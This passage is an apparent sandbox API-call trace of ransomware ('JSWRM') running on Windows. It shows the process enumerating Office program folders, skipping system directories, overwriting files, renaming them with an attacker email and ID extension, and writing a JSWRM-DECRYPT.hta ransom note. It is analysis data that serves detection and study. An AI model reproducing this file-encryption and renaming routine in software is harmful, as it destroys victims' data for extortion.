lpDistanceToMoveHigh=0x0) returned 0x0 [0131.194] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xf30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xf30, lpOverlapped=0x0) returned 1 [0131.195] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.195] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xf30, lpOverlapped=0x0) returned 1 [0131.195] CloseHandle (hObject=0x314) returned 1 [0131.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\taskbariconimages256colors.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\taskbariconimages256colors.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.197] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197cab56, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="TaskbarIconImagesMask256Colors.bmp", cAlternateFileName="TASKBA~1.BMP")) returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2=".") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="..") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="...") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="windows") returned -1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="recovery") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="perflogs") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="documents and settings") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="system volume information") returned 1 [0131.197] lstrcmpiW (lpString1="TaskbarIconImagesMask256Colors.bmp", lpString2="msocache") returned 1 [0131.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImagesMask256Colors.bmp", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0131.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImagesMask256Colors.bmp", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TaskbarIconImagesMask256Colors.bmp", lpUsedDefaultChar=0x0) returned 34 [0131.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImagesMask256Colors.bmp", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0131.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TaskbarIconImagesMask256Colors.bmp", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TaskbarIconImagesMask256Colors.bmp", lpUsedDefaultChar=0x0) returned 34 [0131.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.198] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1344) returned 1 [0131.198] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.198] ReadFile (in: hFile=0x314, lpBuffer=0x234408, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesRead=0x345e534*=0x540, lpOverlapped=0x0) returned 1 [0131.227] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.227] WriteFile (in: hFile=0x314, lpBuffer=0x234408*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesWritten=0x345e530*=0x540, lpOverlapped=0x0) returned 1 [0131.227] CloseHandle (hObject=0x314) returned 1 [0131.227] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.229] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2605, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="TipsImage.jpg", cAlternateFileName="TIPSIM~1.JPG")) returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2=".") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="..") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="...") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="windows") returned -1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="recovery") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="perflogs") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="documents and settings") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="system volume information") returned 1 [0131.229] lstrcmpiW (lpString1="TipsImage.jpg", lpString2="msocache") returned 1 [0131.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImage.jpg", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImage.jpg", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipsImage.jpg", lpUsedDefaultChar=0x0) returned 13 [0131.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImage.jpg", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImage.jpg", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipsImage.jpg", lpUsedDefaultChar=0x0) returned 13 [0131.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TipsImage.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\tipsimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.230] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9733) returned 1 [0131.230] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.231] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x2600, lpOverlapped=0x0) returned 1 [0131.233] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.233] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x2600, lpOverlapped=0x0) returned 1 [0131.233] CloseHandle (hObject=0x314) returned 1 [0131.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TipsImage.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\tipsimage.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TipsImage.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\tipsimage.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.234] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x838, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="TipsImageMask.bmp", cAlternateFileName="TIPSIM~1.BMP")) returned 1 [0131.234] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2=".") returned 1 [0131.234] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="..") returned 1 [0131.234] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="...") returned 1 [0131.234] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="windows") returned -1 [0131.235] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="recovery") returned 1 [0131.235] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="perflogs") returned 1 [0131.235] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="documents and settings") returned 1 [0131.235] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.235] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="system volume information") returned 1 [0131.235] lstrcmpiW (lpString1="TipsImageMask.bmp", lpString2="msocache") returned 1 [0131.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImageMask.bmp", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImageMask.bmp", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipsImageMask.bmp", lpUsedDefaultChar=0x0) returned 17 [0131.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImageMask.bmp", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TipsImageMask.bmp", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TipsImageMask.bmp", lpUsedDefaultChar=0x0) returned 17 [0131.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TipsImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\tipsimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.236] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2104) returned 1 [0131.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.236] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x830, lpOverlapped=0x0) returned 1 [0131.238] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.238] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x830, lpOverlapped=0x0) returned 1 [0131.238] CloseHandle (hObject=0x314) returned 1 [0131.238] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TipsImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\tipsimagemask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\TipsImageMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\tipsimagemask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.239] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="VeriSignLogo.jpg", cAlternateFileName="VERISI~1.JPG")) returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2=".") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="..") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="...") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="windows") returned -1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="recovery") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="perflogs") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="documents and settings") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="system volume information") returned 1 [0131.239] lstrcmpiW (lpString1="VeriSignLogo.jpg", lpString2="msocache") returned 1 [0131.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSignLogo.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSignLogo.jpg", cchWideChar=16, lpMultiByteStr=0x2413a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VeriSignLogo.jpg", lpUsedDefaultChar=0x0) returned 16 [0131.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSignLogo.jpg", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VeriSignLogo.jpg", cchWideChar=16, lpMultiByteStr=0x241290, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VeriSignLogo.jpg", lpUsedDefaultChar=0x0) returned 16 [0131.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\VeriSignLogo.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\verisignlogo.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.240] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1104) returned 1 [0131.240] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.240] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x450, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x450, lpOverlapped=0x0) returned 1 [0131.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.242] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x450, lpOverlapped=0x0) returned 1 [0131.242] CloseHandle (hObject=0x314) returned 1 [0131.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\VeriSignLogo.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\verisignlogo.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\VeriSignLogo.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\verisignlogo.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.243] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="VeriSignLogo.jpg", cAlternateFileName="VERISI~1.JPG")) returned 0 [0131.243] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0131.243] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ToolData", cAlternateFileName="")) returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2=".") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="..") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="...") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="windows") returned -1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="recovery") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="perflogs") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="documents and settings") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="$RECYCLE.BIN") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="system volume information") returned 1 [0131.243] lstrcmpiW (lpString1="ToolData", lpString2="msocache") returned 1 [0131.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\jswrm-decrypt.hta")) returned 0xffffffff [0131.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0131.244] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.244] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0131.245] CloseHandle (hObject=0x238) returned 1 [0131.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\jswrm-decrypt.hta")) returned 0x20 [0131.246] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197a4903, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44e347ac, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225316, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0131.246] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.246] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x197a4903, 